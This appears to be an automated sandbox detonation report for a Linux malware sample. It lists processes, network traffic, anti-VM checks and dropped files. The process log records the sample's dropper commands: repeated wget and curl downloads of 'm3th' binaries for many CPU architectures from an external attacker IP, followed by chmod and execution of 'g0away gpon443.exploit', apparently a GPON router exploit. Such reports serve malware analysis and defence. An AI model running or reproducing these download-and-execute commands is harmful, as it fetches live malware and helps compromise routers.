[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.8:443 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-23 04:55

Reported

2024-08-23 04:58

Platform

debian9-armhf-20240611-en

Max time kernel

79s

Max time network

83s

Command Line

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/g0away /tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 N/A

Processes

/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-iXAHmk]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-iXAHmk]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-iXAHmk]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-iXAHmk]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

memory/814-1-0xb6769000-0xb677a044-memory.dmp

memory/837-2-0xb669c000-0xb66ad044-memory.dmp